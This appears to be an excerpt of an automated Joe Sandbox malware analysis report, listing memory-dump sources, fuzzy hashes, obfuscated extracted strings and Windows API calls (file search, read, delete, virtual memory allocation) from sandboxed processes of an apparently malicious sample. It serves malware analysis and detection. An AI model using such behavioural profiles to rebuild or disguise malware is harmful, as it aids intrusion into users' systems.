                            • Instruction ID: 7d57224d49db5c581cba8a66171370a9e2c3e90aa0ff9e42e513e8ef42f7b4ca
                            • Opcode Fuzzy Hash: 457267f689ae709420576e3c2ed7ea0155783dab4b3f625014d16e180db9c955
                            • Instruction Fuzzy Hash: 74F027736103162BD710AF9DAC40B86F7DCEB84230F240622F91CDB240E671E81182E0
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 27c34b64a36c319753689fe31e8a416d15eb09920afed7623eb3b9fc2c63d13f
                            • Instruction ID: 0b88a179bc1cd77de8101c78d8b9b47f24f59d6f31a3c5d0d7422e67401d5c9c
                            • Opcode Fuzzy Hash: 27c34b64a36c319753689fe31e8a416d15eb09920afed7623eb3b9fc2c63d13f
                            • Instruction Fuzzy Hash: F3F0F876200609BBDA10EF99DC41EDB77ADEF89610F108509F919EB241DA70B9528BB1
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 24f94dd29253332ec6dc0043c1e1fb28027a3fc250b28bf24d1e117f6bf48f7a
                            • Instruction ID: 849b6ff122bfc5d2ce66c1c24e5ddca98e35de7311184e612ae54b2d8b20028f
                            • Opcode Fuzzy Hash: 24f94dd29253332ec6dc0043c1e1fb28027a3fc250b28bf24d1e117f6bf48f7a
                            • Instruction Fuzzy Hash: E8F0A7A5D043097EEB20FAE8AC89EB672FDEB0C200F0045C5B909DB241E5709D944AA6
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 66be5ddc2b89073eb30e9d0bd3799b043242f50acd063acfbdbcd1ab245d0047
                            • Instruction ID: f9f70af7ce86547870967b99c09b54a615d76df8a9ba2645e779b931381ded81
                            • Opcode Fuzzy Hash: 66be5ddc2b89073eb30e9d0bd3799b043242f50acd063acfbdbcd1ab245d0047
                            • Instruction Fuzzy Hash: 27E06D752002087BD614EE98DC41EDB77ACEFC8710F508059F909A7241D670B9118BB5
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f4a9ab2ace1666e9c287364a6deee2f926b4652e1058a4290791bef2b8197fbc
                            • Instruction ID: 03e1eb6be42e5fe500dff3f4c927833cfd0f6f6d1dba502cf5578cee64f580c8
                            • Opcode Fuzzy Hash: f4a9ab2ace1666e9c287364a6deee2f926b4652e1058a4290791bef2b8197fbc
                            • Instruction Fuzzy Hash: BCF0827180520DEBDB24CFA8D841BDDBBB8EB04320F1087AAE825DB2C0E7349750C781
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 508ffebd264a9cc3a4f900e8cb5139ae0d22c44b00566a843a8fc55bd48950ed
                            • Instruction ID: 31651e2c89fcc03af38509ad1b5f712c6c6d30d927848285814f49b9d0c3b198
                            • Opcode Fuzzy Hash: 508ffebd264a9cc3a4f900e8cb5139ae0d22c44b00566a843a8fc55bd48950ed
                            • Instruction Fuzzy Hash: E7E04F3670031527D22096DA9C06FE7B76CCFC5A60F1945A4FE0CDB341E665A90142E5
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction ID: 1ccd5927757fbca65a019eb32006192c6604879565c814426c900ee1e3971387
                            • Opcode Fuzzy Hash: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction Fuzzy Hash: E1E04F362012147BD620FA59DC01EDBBB6CDBC5610F108455FA0AAB241D6707A0287B1
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77705ef9ec14a1c40eac4b3ba025242317629986cd94bf418820a8540c54fdd4
                            • Instruction ID: 31e004ad3ce3da75aeefbe093b9f92fa70e530b1e24dd91e4df48f5b60997afa
                            • Opcode Fuzzy Hash: 77705ef9ec14a1c40eac4b3ba025242317629986cd94bf418820a8540c54fdd4
                            • Instruction Fuzzy Hash: 10C02B5D228285ADDB12B97CCDC1C0F7F00A98213430A03A9F4838E152D34088D50253
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                            • API String ID: 0-3248090998
                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                            • API String ID: 0-1002149817
                            • String ID: eam$#&7}$#dxa$1<"4$1<"4$5 ea$` m|$b#td$bk &$eamk$ecb#$eomx$i#m|$in| $ki#{$mki#$mxec$mzej$m||`$ta` $ta`7$xa`'$xitx$|`eo$}1<"
                            • API String ID: 0-225369145
                            • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                            • API String ID: 0-3236418099
                            • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                            • API String ID: 0-3236418099
                            • String ID: *r$,$3e$A$A4$B?$D$F$Mh3e$O$O$Y$f$g&$h%$m$rp$t
                            • API String ID: 0-2370131731
                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                            • API String ID: 0-392141074
                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                            • API String ID: 0-392141074
                            • String ID: ;'>?$@D]@$@ZS2$C,BC$C@]B$C]AG$D]@E$ES[8$FFS $F]CS$S+SB$\GG]$s
                            • API String ID: 0-1634341979
                            • String ID: ;'>?$@D]@$@ZS2$C,BC$C@]B$C]AG$D]@E$ES[8$FFS $F]CS$S+SB$\GG]$s
                            • API String ID: 0-1634341979
                            • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                            • API String ID: 0-2356907671
                            • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                            • API String ID: 0-2356907671
                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                            • API String ID: 0-685823316
                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                            • API String ID: 0-685823316
                            • String ID: :$:$:$A$I$N$P$m$s$t
                            • API String ID: 0-2304485323
                            • String ID: :$:$:$A$I$N$P$m$s$t
                            • API String ID: 0-2304485323
                            • String ID: #$,$3$B$W$]$_$o$t$~
                            • API String ID: 0-1062738339
                            • String ID: L$S$\$a$c$e$l
                            • API String ID: 0-3322591375
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: F$P$T$f$r$x
                            • API String ID: 0-2523166886
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: F$P$T$f$r$x
                            • API String ID: 0-2523166886
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $i$l$o$u
                            • API String ID: 0-2051669658
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $i$l$o$u
                            • API String ID: 0-2051669658
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$k$o
                            • API String ID: 0-3624523832
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$h$o
                            • API String ID: 0-3662636641
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$k$o
                            • API String ID: 0-3624523832
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                            • API String ID: 0-2877786613
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$h$o
                            • API String ID: 0-3662636641
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -$1$H$z
                            • API String ID: 0-597413025
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$k$o
                            • API String ID: 0-3624523832
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $e$k$o
                            • API String ID: 0-3624523832

                            Execution Graph

                            Execution Coverage:2.6%
                            Dynamic/Decrypted Code Coverage:4.2%
                            Signature Coverage:1.5%
                            Total number of Nodes:457
                            Total number of Limit Nodes:72
                            APIs
                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0282B964
                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0282B99F
                            • FindClose.KERNELBASE(?), ref: 0282B9AA
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNext
                            • String ID:
                            • API String ID: 3541575487-0
                            APIs
                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02837810
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            APIs
                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02837958
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 174f0ddcbf07d2546ff7a2ebb0859a43909a4d34a43135080bf407fe4a5062ba
                            • Instruction ID: 3ed91c3a9066ff237650a0508eb97b85885511bd7de1268ff5999d07deeece7d
                            • Opcode Fuzzy Hash: 174f0ddcbf07d2546ff7a2ebb0859a43909a4d34a43135080bf407fe4a5062ba
                            • Instruction Fuzzy Hash: 8A31E8B9A00208AFCB14DF99D881EEFB7B9EF8C314F108119FD19A7240D634A851CBA5
                            APIs
                            • NtAllocateVirtualMemory.NTDLL(028213BE,?,028367D7,00000000,00000004,00003000,?,?,?,?,?,028367D7,028213BE,028213BE,00000000,?), ref: 02837C0A
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: 9300c5f97b15a09c632acfd5eb355f9bd1572517e8ad1941bd802c480e4b648a
                            • Instruction ID: 6ee92de37a37406869db6ea5552c5b7565512d64883dbee3211f121a387d9db4
                            • Opcode Fuzzy Hash: 9300c5f97b15a09c632acfd5eb355f9bd1572517e8ad1941bd802c480e4b648a
                            • Instruction Fuzzy Hash: 93210AB9A00208AFDB14DF58DC81EEBB7BDEF88710F108109FE09A7240D674A951CBA5
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteFile
                            • String ID:
                            • API String ID: 4033686569-0
                            • Opcode ID: 00c5ac12c6d47f6b179701d109dcc82ff3eb903fd1063705622e10769582f13a
                            • Instruction ID: 9ebb67e9090098df55eac0e44d74179ea2884fbf4024e0329d014ff226f559c8
                            • Opcode Fuzzy Hash: 00c5ac12c6d47f6b179701d109dcc82ff3eb903fd1063705622e10769582f13a
                            • Instruction Fuzzy Hash: B301C4796007047FD610EA68DC41FEB776DDF89710F404509FA099B280DB7479118BE6
                            APIs
                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02837A37
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction ID: 6dc69869dfe9907ebebe46dfd77bd4f9b8086e738eb7b91b9cacf21d66b349db
                            • Opcode Fuzzy Hash: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction Fuzzy Hash: 94E0863A2012147BD620FA59DC01FDBBB6DDFC5754F408415FA0DA7281C670791187F5
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b10f66d2a88a5f1ebc1a9c4cfb48b4207491e70ad243252827676cdd91c2b116
                            • Instruction ID: ddfb8b7a0a1f0e7cca071f90c6037f0192ebf91d34c92caa897ca0e76a76a616
                            • Opcode Fuzzy Hash: b10f66d2a88a5f1ebc1a9c4cfb48b4207491e70ad243252827676cdd91c2b116
                            • Instruction Fuzzy Hash: 1F9002656025104661407158480440661159BE1305395C615A1659560C8618D999926A
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ebcccf5696c1638d49688d237c08538317f6c9e876332f9d73f2d114f1819abf
                            • Instruction ID: 1ef8b96ba4ed95dbe986a14b150e48fa0907c1b4e1caaa3463988e8d56f63b1d
                            • Opcode Fuzzy Hash: ebcccf5696c1638d49688d237c08538317f6c9e876332f9d73f2d114f1819abf
                            • Instruction Fuzzy Hash: 2890023560681016B1407158488454641159BE0305B55C511E1529554C8A14DA9A5362
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 938b276660738ddb9a189a64b8506fef6a648ebcdf31b8c4fa15dded292e21d9
                            • Instruction ID: d5b96f0c02d213be763939eab8500157f726693cfd2998d477cbfc9b7b93ecac
                            • Opcode Fuzzy Hash: 938b276660738ddb9a189a64b8506fef6a648ebcdf31b8c4fa15dded292e21d9
                            • Instruction Fuzzy Hash: 6390023520241406F1007598540864601158BE0305F55D511A6129555EC665D9D56132
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 83bcc76116c067f0d93bba1d46bd79eca1ce5e4569c9c73ac35b01a140e721f8
                            • Instruction ID: f3eaa8181c3fd58534cc2cd2021d4d4f48ea28786b394ba71ece179dd6a200d0
                            • Opcode Fuzzy Hash: 83bcc76116c067f0d93bba1d46bd79eca1ce5e4569c9c73ac35b01a140e721f8
                            • Instruction Fuzzy Hash: 2390023520241846F10071584404B4601158BE0305F55C516A1229654D8615D9957522
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: de0b2a3baa165bd381e4d464c0491e8a83b4a62d71e6ea8b006c0be1d31ee8fa
                            • Instruction ID: 42733fc250c9602250939d78447b8f5f9a541ab29016955d8b010334ddcd0d0d
                            • Opcode Fuzzy Hash: de0b2a3baa165bd381e4d464c0491e8a83b4a62d71e6ea8b006c0be1d31ee8fa
                            • Instruction Fuzzy Hash: F890023520249806F1107158840474A01158BD0305F59C911A5529658D8695D9D57122
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5147b8cf0b2334579114688ef2e0744c31052760b7dc2baf045815813175e839
                            • Instruction ID: 8361c8cb372c5faf517a5614863b70ac8f8efb7866d731f5b6105f58859832f4
                            • Opcode Fuzzy Hash: 5147b8cf0b2334579114688ef2e0744c31052760b7dc2baf045815813175e839
                            • Instruction Fuzzy Hash: 69900225243451567545B158440450741169BE0245795C512A2519950C8526E99AD622
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e1ab36b9b1722ec2da1d80574566ba511967e420528651bd7ec5312d72589c96
                            • Instruction ID: f48ee5d14c6de728ff7a35817066dff2a0010aa9da58750b2f54f17704437562
                            • Opcode Fuzzy Hash: e1ab36b9b1722ec2da1d80574566ba511967e420528651bd7ec5312d72589c96
                            • Instruction Fuzzy Hash: F490023520241417F1117158450470701198BD0245F95C912A1529558D9656DA96A122
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9cfd510c071ac9faf3a0a49e7cc791315e827f02265dcf9d9d962f26e3d6b411
                            • Instruction ID: 62d589d46b73cb14bb8f72de3ae07318d3f53853e34ce27b9f44d99dccb37030
                            • Opcode Fuzzy Hash: 9cfd510c071ac9faf3a0a49e7cc791315e827f02265dcf9d9d962f26e3d6b411
                            • Instruction Fuzzy Hash: 1490022D21341006F1807158540860A01158BD1206F95D915A111A558CC915D9AD5322
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9aaa06dc1d7d9ec61f9e9cc12c0b25ff2d8c81afb6ad2d80220d9cb0978c21e8
                            • Instruction ID: 03856e0e8f3db9209e7491e2ea03ba34ec703fdbb931d185a13dc51f311362bf
                            • Opcode Fuzzy Hash: 9aaa06dc1d7d9ec61f9e9cc12c0b25ff2d8c81afb6ad2d80220d9cb0978c21e8
                            • Instruction Fuzzy Hash: AA90022530241007F140715854186064115DBE1305F55D511E1519554CD915D99A5223
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5b2c27e7b5c50173b401a8957497d69309b3f3a8532fa3559a7c5c2b001896d4
